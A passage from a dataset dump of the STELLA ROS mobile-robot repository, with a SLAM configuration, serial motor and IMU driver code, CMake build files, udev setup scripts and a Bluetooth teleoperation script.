\"trajectory_builder.lua\"\r\n\r\noptions = {\r\n map_builder = MAP_BUILDER,\r\n trajectory_builder = TRAJECTORY_BUILDER,\r\n map_frame = \"map\",\r\n tracking_frame = \"odom\", -- imu_link, If you are using gazebo, use 'base_footprint' (libgazebo_ros_imu's bug)\r\n published_frame = \"odom\",\r\n odom_frame = \"odom\",\r\n provide_odom_frame = false,\r\n publish_frame_projected_to_2d = false,\r\n use_odometry = true,\r\n use_nav_sat = false,\r\n use_landmarks = false,\r\n num_laser_scans = 1,\r\n num_multi_echo_laser_scans = 0,\r\n num_subdivisions_per_laser_scan = 1,\r\n num_point_clouds = 0,\r\n lookup_transform_timeout_sec = 0.2,\r\n submap_publish_period_sec = 0.3,\r\n pose_publish_period_sec = 5e-3,\r\n trajectory_publish_period_sec = 30e-3,\r\n rangefinder_sampling_ratio = 1.,\r\n odometry_sampling_ratio = 0.1,\r\n fixed_frame_pose_sampling_ratio = 1.,\r\n imu_sampling_ratio = 0.1,\r\n landmarks_sampling_ratio = 1.,\r\n}\r\n\r\nMAP_BUILDER.use_trajectory_builder_2d = true\r\n\r\nTRAJECTORY_BUILDER_2D.min_range = 0.1\r\nTRAJECTORY_BUILDER_2D.max_range = 3.5\r\nTRAJECTORY_BUILDER_2D.missing_data_ray_length = 3.\r\nTRAJECTORY_BUILDER_2D.use_imu_data = false \r\nTRAJECTORY_BUILDER_2D.use_online_correlative_scan_matching = true\r\nTRAJECTORY_BUILDER_2D.motion_filter.max_angle_radians = math.rad(0.1)\r\n\r\nPOSE_GRAPH.constraint_builder.min_score = 0.65\r\nPOSE_GRAPH.constraint_builder.global_localization_min_score = 0.7\r\n\r\nreturn options\r\n\r\n" }, { "alpha_fraction": 0.6065573692321777, "alphanum_fraction": 0.6495901346206665, "avg_line_length": 21.80487823486328, "blob_id": "112b71c3fc95e502117e4e33e2e0efcb3d683857", "content_id": "70d9aea5ba359b6ed8fc49484661573d43a529c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 976, "license_type": "no_license", "max_line_length": 107, "num_lines": 41, "path": "/stella/stella_ahrs/src/listener.h", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "#include <thread>\r\n#include <ros/ros.h>\r\n#include <fcntl.h> // Contains file controls like O_RDWR\r\n#include <errno.h> // Error integer and strerror() function\r\n#include <termios.h> // Contains POSIX terminal control definitions\r\n#include <unistd.h> // write(), read(), close()\r\n#include <sensor_msgs/Imu.h>\r\n#include <vector>\r\n#include <sstream>\r\n#include <iostream>\r\n#include <stdlib.h>\r\n#include <tf2/LinearMath/Quaternion.h>\r\n#include <math.h>\r\n#include <pthread.h>\r\n#include \"MwSerial.hpp\"\r\n\r\n\r\n#define DEG2RAD( a ) ( (a) * (M_PI/180.0f) )\r\n#define COS(a) cos(DEG2RAD(a))\r\n#define SIN(a) sin(DEG2RAD(a))\r\n\r\n#define DeviceID 0x01\r\n#define STX 0x02\r\n#define ETX 0x03\r\n#define Command 0xF0\r\n\r\n#define ACC 0x33\r\n#define GYO 0x34\r\n#define DEG 0x35\r\n\r\n\r\nusing namespace std;\r\n\r\nchar data[8];\r\nlong id = 0;\r\nint length = 0;\r\nbool run = true;\r\n\r\nint16_t acc_x = 0, acc_y = 0, acc_z = 0, gyo_x = 0, gyo_y = 0, gyo_z = 0, deg_x = 0, deg_y = 0, deg_z = 0; \r\n\r\nsensor_msgs::Imu imu;\r\n" }, { "alpha_fraction": 0.5980551242828369, "alphanum_fraction": 0.5980551242828369, "avg_line_length": 15.685714721679688, "blob_id": "d4cc58a1cd03f37278f771d5ada9f7dba816dff0", "content_id": "45b4803d91483b763aa60d63724450252675ea73", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 733, "license_type": "no_license", "max_line_length": 66, "num_lines": 35, "path": "/stella/stella_ahrs/src/Lock.hpp", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "#include<pthread.h>\r\n\r\n#pragma once\r\n\r\nclass CLock \r\n{\r\nprivate:\r\n\tpthread_mutex_t m;\r\n\tpthread_cond_t sync_cond;\r\npublic:\r\n\tCLock() \r\n\t{\r\n\t\t// 뮤텍스 속성 변수 생성\r\n\t\tpthread_mutexattr_t mAttr;\r\n\t\t// 뮤텍스 속성에 대한 재귀 뮤텍스 설정\r\n\t\tpthread_mutexattr_settype (& mAttr, PTHREAD_MUTEX_RECURSIVE_NP);\r\n\t\t// mutex 속성을 사용하여 mutex 생성\r\n\t\tpthread_mutex_init (& m, & mAttr);\r\n\t\t// 뮤텍스 변수를 초기화 한 후 뮤텍스 속성을 삭제할 수 있습니다.\r\n\t\tpthread_mutexattr_destroy (& mAttr);\r\n\t}\r\n \t~CLock()\r\n\t{\r\n\t\t pthread_mutex_destroy (& m);\r\n\t}\r\n\r\n\tinline void Lock()\r\n\t{\r\n\t\tpthread_mutex_lock (&m);\r\n\t}\r\n\tinline void Unlock() \r\n\t{\r\n\t\tpthread_mutex_unlock(&m);\r\n\t}\r\n};" }, { "alpha_fraction": 0.6645077466964722, "alphanum_fraction": 0.6774611473083496, "avg_line_length": 26.518518447875977, "blob_id": "412a4251ca00d38f3582c91fc43d5a350a473e66", "content_id": "aa5cdf9fa9c76410c24233591e882774feccc2be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 772, "license_type": "no_license", "max_line_length": 88, "num_lines": 27, "path": "/stella/ydlidar_ros/sdk/samples/CMakeLists.txt", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "\r\ncmake_minimum_required(VERSION 2.8)\r\nPROJECT(ydlidar_test)\r\nset(CMAKE_CXX_FLAGS \"${CMAKE_CXX_FLAGS} -std=c++11\")\r\nadd_definitions(-std=c++11) # Use C++11\r\n\r\nset(YDLIDAR_INCLUDE_DIRS ${CMAKE_CURRENT_SOURCE_DIR}/../include)\r\nIF (WIN32)\r\nlist(APPEND YDLIDAR_LIBRARIES ${CMAKE_CURRENT_SOURCE_DIR}/../lib/libydlidar_driver.dll)\r\nELSE()\r\nlist(APPEND YDLIDAR_LIBRARIES ${CMAKE_CURRENT_SOURCE_DIR}/../lib/libydlidar_driver.so)\r\nENDIF()\r\n\r\n\r\n#Include directories\r\nINCLUDE_DIRECTORIES(\r\n ${CMAKE_SOURCE_DIR}\r\n ${CMAKE_SOURCE_DIR}/../\r\n ${CMAKE_CURRENT_BINARY_DIR}\r\n ${YDLIDAR_INCLUDE_DIRS}\r\n)\r\n\r\n\r\nADD_EXECUTABLE(${PROJECT_NAME}\r\n main.cpp)\r\n\r\n# Add the required libraries for linking:\r\nTARGET_LINK_LIBRARIES(${PROJECT_NAME} ${YDLIDAR_LIBRARIES})\r\n" }, { "alpha_fraction": 0.499316543340683, "alphanum_fraction": 0.513571560382843, "avg_line_length": 23.984771728515625, "blob_id": "42a3279678bf643ad03b6046940366df64419914", "content_id": "70563c0b93b0c1eae09ff9df33e2d6203c96f5ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5121, "license_type": "no_license", "max_line_length": 116, "num_lines": 197, "path": "/stella/stella_md/src/listener.cpp", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "#include \"listener.h\"\r\n#include \"mobilerobot.h\"\r\n\r\nntrex_can_fifo::ntrex_can_fifo()\r\n{\r\n chatter_pub = n.advertise<nav_msgs::Odometry>(\"odom\", 50);\r\n sub = n.subscribe(\"cmd_vel\", 10, &ntrex_can_fifo::chatterCallback, this);\r\n\r\n thread_read_AHRS = new std::thread(&ntrex_can_fifo::readStatus, this);\r\n}\r\n\r\nntrex_can_fifo::~ntrex_can_fifo()\r\n{\r\n thread_read_AHRS->join();\r\n\r\n delete thread_read_AHRS;\r\n close(serial_port);\r\n}\r\n\r\nvoid ntrex_can_fifo::MD_input(char *str)\r\n{\r\n if (!strcmp(str, \"move\"))\r\n {\r\n sprintf(write_buf, \"mvc=%0.3f,%0.3f\\r\\n\", left_rpm, rigth_rpm); //\r\n\r\n for (int i = 0; i < strlen(write_buf); i++)\r\n {\r\n unsigned char buf = (unsigned char)(write_buf[i]);\r\n write(serial_port, &buf, sizeof(buf));\r\n }\r\n }\r\n\r\n if (!strcmp(str, \"encoder\"))\r\n {\r\n sprintf(write_buf, \"mp\\r\\n\");\r\n\r\n for (int i = 0; i < strlen(write_buf); i++)\r\n {\r\n unsigned char buf = (unsigned char)(write_buf[i]);\r\n write(serial_port, &buf, sizeof(buf));\r\n }\r\n }\r\n}\r\n\r\nvoid ntrex_can_fifo::chatterCallback(const geometry_msgs::Twist::ConstPtr &msg)\r\n{\r\n calculate_wheel_vel(msg->linear.x, msg->angular.z, &left_rpm, &rigth_rpm);\r\n\r\n linear_x = msg->linear.x;\r\n angular_ = msg->angular.z;\r\n\r\n MD_input(\"move\");\r\n}\r\n\r\nvoid ntrex_can_fifo::readStatus()\r\n{\r\n ros::Rate rate(20);\r\n\r\n while (1)\r\n {\r\n MD_input(\"encoder\");\r\n\r\n current_time = ros::Time::now();\r\n\r\n int i = 0;\r\n char parsing[3][20];\r\n double dt = (current_time - last_time).toSec();\r\n\r\n int nbytes = read(serial_port, &read_buf, sizeof(read_buf));\r\n\r\n if (dt > 10)\r\n {\r\n dt = 0.2;\r\n }\r\n\r\n if (nbytes > 0)\r\n {\r\n char *ptr = strtok(read_buf + 4, \",\");\r\n\r\n i = 0;\r\n\r\n while (ptr != NULL)\r\n {\r\n strcpy(parsing[i++], ptr);\r\n ptr = strtok(NULL, \",\");\r\n }\r\n\r\n left_encoder = atoi(parsing[0]);\r\n right_encoder = atoi(parsing[1]);\r\n\r\n delta_left = (left_encoder - left_encoder_prev) * -1;\r\n delta_right = right_encoder - right_encoder_prev;\r\n\r\n if (abs(delta_left) < 12000 && abs(delta_right) < 12000)\r\n {\r\n delta_s = (delta_left + delta_right) / 2.0 / pulse_per_distance;\r\n delta_th = ((delta_right - delta_left) / wheel_to_wheel_d / pulse_per_distance);\r\n delta_x = (delta_s * cos(th + delta_th / 2.0));\r\n delta_y = (delta_s * sin(th + delta_th / 2.0));\r\n }\r\n\r\n x -= delta_x;\r\n y -= delta_y;\r\n th += delta_th;\r\n }\r\n geometry_msgs::Quaternion Quaternion = tf::createQuaternionMsgFromYaw(th);\r\n \r\n transform.setOrigin( tf::Vector3(x, y,0));\r\n transform.setRotation(tf::Quaternion(Quaternion.x,Quaternion.y,Quaternion.z,Quaternion.w));\r\n\r\n odom_broadcaster.sendTransform(tf::StampedTransform(transform, ros::Time::now(), \"odom\", \"base_footprint\"));\r\n\r\n nav_msgs::Odometry odom;\r\n\r\n odom.header.stamp = current_time;\r\n odom.header.frame_id = \"odom\";\r\n\r\n odom.pose.pose.position.x = x;\r\n odom.pose.pose.position.y = y;\r\n odom.pose.pose.position.z = 0.0;\r\n odom.pose.pose.orientation = Quaternion;\r\n\r\n odom.child_frame_id = \"base_footprint\";\r\n odom.twist.twist.linear.x = linear_x;\r\n odom.twist.twist.linear.y = 0;\r\n odom.twist.twist.angular.z = angular_;\r\n\r\n chatter_pub.publish(odom);\r\n left_encoder_prev = left_encoder;\r\n right_encoder_prev = right_encoder;\r\n\r\n rate.sleep();\r\n last_time = current_time;\r\n }\r\n}\r\n\r\nvoid ntrex_can_fifo::run()\r\n{\r\n ros::Rate rate(1000);\r\n ros::spin();\r\n\r\n while (ros::ok())\r\n {\r\n rate.sleep();\r\n }\r\n}\r\n\r\nint main(int argc, char **argv)\r\n{\r\n ros::init(argc, argv, \"stella_mw_driver_node\");\r\n \r\n serial_port = open(\"/dev/MW\", O_RDWR);\r\n\r\n struct termios tty;\r\n\r\n if (tcgetattr(serial_port, &tty) != 0)\r\n {\r\n printf(\"Error %i from tcgetattr: %s\\n\", errno, strerror(errno));\r\n return 1;\r\n }\r\n\r\n tty.c_cflag &= ~PARENB;\r\n tty.c_cflag &= ~CSTOPB;\r\n tty.c_cflag &= ~CSIZE;\r\n tty.c_cflag |= CS8;\r\n tty.c_cflag &= ~CRTSCTS;\r\n tty.c_cflag |= CREAD | CLOCAL;\r\n\r\n tty.c_lflag &= ~ICANON;\r\n tty.c_lflag &= ~ECHO;\r\n tty.c_lflag &= ~ECHOE;\r\n tty.c_lflag &= ~ECHONL;\r\n tty.c_lflag &= ~ISIG;\r\n tty.c_iflag &= ~(IXON | IXOFF | IXANY);\r\n tty.c_iflag &= ~(IGNBRK | BRKINT | PARMRK | ISTRIP | INLCR | IGNCR | ICRNL);\r\n\r\n tty.c_oflag &= ~OPOST;\r\n tty.c_oflag &= ~ONLCR;\r\n\r\n tty.c_cc[VTIME] = 10;\r\n tty.c_cc[VMIN] = 0;\r\n\r\n cfsetispeed(&tty, B115200);\r\n cfsetospeed(&tty, B115200);\r\n\r\n if (tcsetattr(serial_port, TCSANOW, &tty) != 0)\r\n {\r\n printf(\"Error %i from tcsetattr: %s\\n\", errno, strerror(errno));\r\n return 1;\r\n }\r\n\r\n ntrex_can_fifo node;\r\n\r\n node.run();\r\n\r\n return 0;\r\n}\r\n\r\n" }, { "alpha_fraction": 0.5936952829360962, "alphanum_fraction": 0.6077057719230652, "avg_line_length": 15.709677696228027, "blob_id": "4cd70e34e508bc05241a3f0914e27b6213a155e8", "content_id": "c485e7872a69be18e9f36dde7688a3b8ba190cfd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 571, "license_type": "no_license", "max_line_length": 50, "num_lines": 31, "path": "/stella/ydlidar_ros/sdk/CMakeLists.txt", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "\r\nadd_definitions(-std=c++11) # Use C++11\r\ninclude_directories(include)\r\ninclude_directories(src)\r\n\r\nIF (WIN32)\r\nFILE(GLOB SDK_SRC \r\n \"src/*.cpp\"\r\n \"src/*.h\"\r\n \"src/impl/windows/*.cpp\"\r\n \"src/impl/windows/*.h\"\r\n)\r\n\t\r\nELSE()\r\nFILE(GLOB SDK_SRC \r\n \"src/*.cpp\"\r\n \"src/*.h\"\r\n \"src/impl/unix/*.cpp\"\r\n \"src/impl/unix/*.h\"\r\n)\r\n\r\n\t\r\nENDIF()\r\n\r\nadd_subdirectory(samples)\r\n\r\nadd_library(ydlidar_driver SHARED ${SDK_SRC})\r\nset(LIBRARY_OUTPUT_PATH ${PROJECT_SOURCE_DIR}/lib)\r\nIF (WIN32)\r\nELSE()\r\ntarget_link_libraries(ydlidar_driver rt pthread)\r\nENDIF() \r\n" }, { "alpha_fraction": 0.4938271641731262, "alphanum_fraction": 0.5102880597114563, "avg_line_length": 9.380952835083008, "blob_id": "959b29fc41bb4abaa2feb774cdbd2f6a51b8fee9", "content_id": "4757de28217686607a008a5b2243f518eb092a70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 243, "license_type": "no_license", "max_line_length": 26, "num_lines": 21, "path": "/stella/stella_ahrs/src/SerialTypedf.hpp", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "#pragma once\r\n\r\n#define BIN_PACKET_LEN\t\t13\r\n\r\nstruct SerialMessage\r\n{\r\n int length;\r\n long ID;\r\n char data[8];\r\n};\r\n\r\n\r\nstruct Usb2Packet\r\n{\r\n double time_recv;\r\n union \r\n {\r\n SerialMessage msg;\r\n };\r\n \r\n};\r\n\r\n\r\n" }, { "alpha_fraction": 0.607922375202179, "alphanum_fraction": 0.6160064935684204, "avg_line_length": 28.924999237060547, "blob_id": "5b3324406162cf5b16771d0954b660d955bb4828", "content_id": "45cbf6022b98fd182b6f3cd2ade3a2b851326cc3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1237, "license_type": "no_license", "max_line_length": 80, "num_lines": 40, "path": "/stella_slam/include/stella_slam/flat_world_imu_node.h", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "/*******************************************************************************\r\n* Copyright 2018 ROBOTIS CO., LTD.\r\n*\r\n* Licensed under the Apache License, Version 2.0 (the \"License\");\r\n* you may not use this file except in compliance with the License.\r\n* You may obtain a copy of the License at\r\n*\r\n* http://www.apache.org/licenses/LICENSE-2.0\r\n*\r\n* Unless required by applicable law or agreed to in writing, software\r\n* distributed under the License is distributed on an \"AS IS\" BASIS,\r\n* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n* See the License for the specific language governing permissions and\r\n* limitations under the License.\r\n*******************************************************************************/\r\n\r\n#ifndef FLAT_WORLD_IMU_NODE_H_\r\n#define FLAT_WORLD_IMU_NODE_H_\r\n\r\n#include <ros/ros.h>\r\n#include <sensor_msgs/Imu.h>\r\n\r\n#define GRAVITY 9.8\r\n\r\nclass FlatWorldImuNode\r\n{\r\n public:\r\n FlatWorldImuNode();\r\n ~FlatWorldImuNode();\r\n bool init();\r\n\r\n private:\r\n ros::NodeHandle nh_;\r\n ros::Time last_published_time_;\r\n ros::Publisher publisher_;\r\n ros::Subscriber subscriber_;\r\n void msgCallback(const sensor_msgs::ImuConstPtr imu_in);\r\n};\r\n\r\n#endif // FLAT_WORLD_IMU_NODE_H_\r\n" }, { "alpha_fraction": 0.6143572330474854, "alphanum_fraction": 0.6260433793067932, "avg_line_length": 15.323529243469238, "blob_id": "1e5e47f178f0b642548fc10709caf22e296fd4e2", "content_id": "573d671b9c511f8ae891e869b4be614172229c46", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 599, "license_type": "no_license", "max_line_length": 66, "num_lines": 34, "path": "/stella/stella_ahrs/src/UsbPacket.hpp", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "#pragma once\r\n\r\n#include <pthread.h>\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n\r\n\r\n#include \"SerialCOM.hpp\"\r\n#include \"SerialTypedf.hpp\"\r\n\r\n#define STX 0x02\r\n#define ETX 0x03\r\n\r\nclass SerialCom;\r\n\r\nclass UsbPacket\r\n{\r\nprivate:\r\n \r\npublic:\r\n UsbPacket();\r\n ~UsbPacket();\r\n \r\n int _RecvPacket(char *packet, int length);\r\n bool RecvPacket(Usb2Packet &pkt);\r\n bool SendPacket(void);\r\n char checkSum(char *packet, int start_length, int end_length);\r\n int FindMove(char *packet, int length, char stx);\r\n \r\n\r\nprotected:\r\n SerialCOM* _bus;\r\n};\r\n\r\n\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.7279999852180481, "alphanum_fraction": 0.7300000190734863, "avg_line_length": 40.66666793823242, "blob_id": "b509bdc6d8d4ed9a3ac49d4f0c9fc4ab2a6696d0", "content_id": "000f78022d949ce675ec640e3dbd8fc5265c402d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 500, "license_type": "no_license", "max_line_length": 141, "num_lines": 12, "path": "/stella_bringup/create_udev_rules.sh", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\necho \"remap the devices serial port(ttyUSBX, ttySX) to ydlidar, AHRS, Motordriver, Bluetooth\"\necho \"devices usb connection as /dev/YDLIDAR, /dev/AHRS, /dev/MW, /dev/BT , check it using the command : ls -l /dev|grep -e ttyUSB -e ttyS0\"\necho \"start copy stella.rules to /etc/udev/rules.d/\"\necho \"`rospack find stella_bringup`/stella.rules\"\nsudo cp `rospack find stella_bringup`/stella.rules /etc/udev/rules.d\necho \" \"\necho \"Restarting udev\"\necho \"\"\nsudo udevadm trigger\necho \"finish \"\n" }, { "alpha_fraction": 0.5539963245391846, "alphanum_fraction": 0.5838926434516907, "avg_line_length": 22.08450698852539, "blob_id": "8ca88128724f18865d2da4c32a72751b800c1d24", "content_id": "a81034019e024ec9c456f4fa61ec04bce34afa03", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1639, "license_type": "no_license", "max_line_length": 55, "num_lines": 71, "path": "/stella_teleop_bluetooth/src/stella_teleop_bluetooth.py", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python\n\nimport serial\nimport time\nimport rospy\nfrom geometry_msgs.msg import Twist\n\nif __name__==\"__main__\":\n\tserial_port = serial.Serial(\n\t\tport=\"/dev/BT\",\n \t\tbaudrate=9600,\n \t\tbytesize=serial.EIGHTBITS,\n \t\tparity=serial.PARITY_NONE,\n \t\tstopbits=serial.STOPBITS_ONE,\n\t)\n\n\t# Wait a second to let the port initialize\n\ttime.sleep(1)\n\t\n\trospy.init_node('stella_teleop_bluetooth_node')\n\tpub = rospy.Publisher('cmd_vel', Twist, queue_size=10)\n\trate = rospy.Rate(10)\n\ttarget_linear_vel = 0.0\n\ttarget_angular_vel = 0.0\n\n\ttry:\n \t\twhile True:\n \t\tif serial_port.inWaiting() > 0:\n \t\t\tdata = serial_port.readline()\n \t\t\ta = data[0:5]\n \t\t\ta = str(a)\n\t\t\t\ta = a.split(\"/\")\n\t\t\t\t\n\t\t\t\tif a[0] == 'F':\n\t\t\t\t\ttarget_linear_vel = float(a[1]) * 1\n\t\t\t\telif a[0] == 'B':\n\t\t\t\t\ttarget_linear_vel = float(a[1]) * -1\n\t\t\t\telif a[0] == 'L':\n\t\t\t\t\ttarget_angular_vel = float(a[1]) * 1.57\n\t\t\t\telif a[0] == 'R':\n\t\t\t\t\ttarget_angular_vel = float(a[1]) * -1.57\n\t\t\t\telif a[0] == 'S':\n\t\t\t\t\ttarget_linear_vel = 0.0\n\t\t\t\t\ttarget_angular_vel = 0.0\n\t\t\t\t\t\t\t\t\t\n\t\t\telse:\n\t\t\t\ttarget_linear_vel = 0.0\n\t\t\t\ttarget_angular_vel = 0.0\t\t\n\t\t\n\t\t\ttwist = Twist()\n\t\t\t\n\t\t\ttwist.linear.x = target_linear_vel\n\t\t\ttwist.linear.y = 0.0\n\t\t\ttwist.linear.z = 0.0\n\n\t\t\ttwist.angular.x = 0.0\n\t\t\ttwist.angular.y = 0.0\n\t\t\ttwist.angular.z = target_angular_vel\n\t\t\t\n\n\t\t\tpub.publish(twist)\n\t\t\trate.sleep()\n\n\texcept KeyboardInterrupt:\n \t\tprint(\"Exiting Program\")\n\texcept Exception as exception_error:\n \t\tprint(\"Error occurred. Exiting Program\")\n \t\tprint(\"Error: \" + str(exception_error))\n\tfinally:\n \t\tserial_port.close()\n \tpass\n" }, { "alpha_fraction": 0.7003257274627686, "alphanum_fraction": 0.7133550643920898, "avg_line_length": 15.941176414489746, "blob_id": "a1622f95720a0767db10981f4cad432d0bdf5057", "content_id": "e60a03523cb308dfd092e491429c793e94ebf84e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 307, "license_type": "no_license", "max_line_length": 41, "num_lines": 17, "path": "/stella/ydlidar_ros/sdk/include/utils.h", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "\r\n#pragma once\r\n\r\n#ifdef WIN32\r\n#ifdef ydlidar_EXPORTS\r\n#define YDLIDAR_API __declspec(dllexport)\r\n#else\r\n#ifdef ydlidarStatic_EXPORTS\r\n#define YDLIDAR_API \r\n#else\r\n\r\n#define YDLIDAR_API __declspec(dllimport)\r\n#endif // YDLIDAR_STATIC_EXPORTS\r\n#endif\r\n\r\n#else \r\n#define YDLIDAR_API \r\n#endif // ifdef WIN32\r\n" }, { "alpha_fraction": 0.6129793524742126, "alphanum_fraction": 0.6389380693435669, "avg_line_length": 20.600000381469727, "blob_id": "3b725f393f409533393c20c6f76e8888ed4d3665", "content_id": "fa204e3ccb050c1f7db71904ee2dcfe5631cd46f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1695, "license_type": "no_license", "max_line_length": 112, "num_lines": 75, "path": "/stella/stella_md/src/listener.h", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "#include <thread>\r\n#include <ros/ros.h>\r\n#include <fcntl.h> // Contains file controls like O_RDWR\r\n#include <errno.h> // Error integer and strerror() function\r\n#include <termios.h> // Contains POSIX terminal control definitions\r\n#include <unistd.h> // write(), read(), close()\r\n#include <sensor_msgs/Imu.h>\r\n#include <vector>\r\n#include <sstream>\r\n#include <iostream>\r\n#include <stdlib.h>\r\n#include <tf2/LinearMath/Quaternion.h>\r\n#include <math.h>\r\n#include <geometry_msgs/Twist.h>\r\n#include <string.h>\r\n#include <nav_msgs/Odometry.h>\r\n#include <tf/transform_broadcaster.h>\r\n\r\n//\r\n\r\n\r\n\r\n#define DEG2RAD( a ) ( (a) * (M_PI/180.0f) )\r\n#define COS(a) cos(DEG2RAD(a))\r\n#define SIN(a) sin(DEG2RAD(a))\r\n\r\n\r\nusing namespace std;\r\n\r\nfloat imu_data[8] = {0,};\r\nchar read_buf [256];\r\nint serial_port;\r\n\r\nchar write_buf [256];\r\nchar *sArr[2] = {0,};\r\n\r\n\r\nsensor_msgs::Imu imu;\r\n\r\n\r\nros::Time current_time, last_time;\r\n\r\nfloat left_rpm = 0, rigth_rpm = 0;\r\nint left_encoder = 0, right_encoder = 0,delta_left = 0,delta_right = 0,left_encoder_prev=0,right_encoder_prev=0;\r\n\r\nfloat linear_x = 0.0, angular_ = 0.0;\r\n\r\ndouble delta_th=0.0,delta_s=0.0,delta_x=0.0,delta_y=0.0,x=0.0,y=0.0,th=0.0;\r\n\r\nclass ntrex_can_fifo\r\n{\r\n private:\r\n ros::Publisher chatter_pub;\r\n ros::Subscriber sub;\r\n\r\n ros::NodeHandle n;\r\n\r\n std::thread* thread_read_AHRS;\r\n std::thread* thread_pub_odm;\r\n\r\n tf::TransformBroadcaster odom_broadcaster;\r\n tf::Transform transform;\r\n \r\n public:\r\n\r\n ~ntrex_can_fifo();\r\n ntrex_can_fifo();\r\n\r\n void readStatus();\r\n void writepub();\r\n void chatterCallback(const geometry_msgs::Twist::ConstPtr& msg);\r\n void MD_input(char* str);\r\n\r\n void run();\r\n};\r\n" }, { "alpha_fraction": 0.7377622127532959, "alphanum_fraction": 0.7377622127532959, "avg_line_length": 27.600000381469727, "blob_id": "e0a5108e8f225d44723ad728003f975127640921", "content_id": "8337d0b43e2957f3fe39b70f5516e3a50ba69831", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 286, "license_type": "no_license", "max_line_length": 100, "num_lines": 10, "path": "/stella_bringup/delete_udev_rules.sh", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\necho \"delete remap the devices serial port(ttyUSBX,ttySX) to ydlidar, AHRS, Motordriver, Bluetooth\"\necho \"sudo rm /etc/udev/rules.d/stella.rules\"\nsudo rm /etc/udev/rules.d/stella.rules\necho \" \"\necho \"Restarting udev\"\necho \"\"\nsudo udevadm trigger\necho \"finish delete\"\n" } ]
20
DapperDan2520/MyWay2015
https://github.com/DapperDan2520/MyWay2015
22dce69744d439f9335fcd7373e45003e5fe2810
1760ed2bc7f934ed97c550ddff6c31563c078f20
8d4eed992e5c2efc1cf2e938fc165bc9898d4db4
refs/heads/master
2016-09-10T19:00:27.426117
2015-09-24T02:07:14
2015-09-24T02:07:14
34,036,502
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6828793883323669, "alphanum_fraction": 0.6828793883323669, "avg_line_length": 17.39285659790039, "blob_id": "e40528a0a242fe085146e3610e740dafd4bcda35", "content_id": "51dbf33c6bab9719bb16c1509ced19ec63127213", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 514, "license_type": "no_license", "max_line_length": 90, "num_lines": 28, "path": "/routes.py", "repo_name": "DapperDan2520/MyWay2015", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template\nfrom flask.ext.login import LoginManager, UserMixin, current_user, login_user, logout_user\n\napp = Flask(__name__)\n\nimport db\n\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\n\n'''class UserNotFoundError(Exception):\n\tpass\n\nclass User(UserMixin):\n\t\n\tdef __init__(self, id):\n\t\tif not id in self.\n'''\n\[email protected]('/')\ndef main():\n\treturn render_template('index.html')\n\[email protected]('/signup_check', methods=['POST']):\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)" }, { "alpha_fraction": 0.804651141166687, "alphanum_fraction": 0.804651141166687, "avg_line_length": 14.428571701049805, "blob_id": "d06ec7f982d2a4ab042f75c6150461a44eaf777f", "content_id": "3262982962a187fdb4274b98f47c836c78003df3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 215, "license_type": "no_license", "max_line_length": 70, "num_lines": 14, "path": "/notes.txt", "repo_name": "DapperDan2520/MyWay2015", "src_encoding": "UTF-8", "text": "DB= mysql\nFramework=Flask (python)\nAuthentication strategy=FB Login\n\nDB Setup:\n\nFirst_name\nLast_name\nEmail\nZip_Code\n\nMake sure we are salting passwords and we are hashing them using mysql\n\n-finish the authentication" }, { "alpha_fraction": 0.800000011920929, "alphanum_fraction": 0.800000011920929, "avg_line_length": 36.75, "blob_id": "ee89da98d1d3c4edb5a40b6859679d34cfd38bac", "content_id": "72c42c51c6375249bba2004aac834b193d8d4d73", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 150, "license_type": "no_license", "max_line_length": 90, "num_lines": 4, "path": "/auth.py", "repo_name": "DapperDan2520/MyWay2015", "src_encoding": "UTF-8", "text": "from flask.ext.login import LoginManager, UserMixin, current_user, login_user, logout_user\n\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)" }, { "alpha_fraction": 0.6633166074752808, "alphanum_fraction": 0.713567852973938, "avg_line_length": 25.600000381469727, "blob_id": "860470d56e648852aa86c3aed6277c8a5c193d71", "content_id": "1dddd0f66af7e27e50a99b2dd7a7d7c71a65472f", 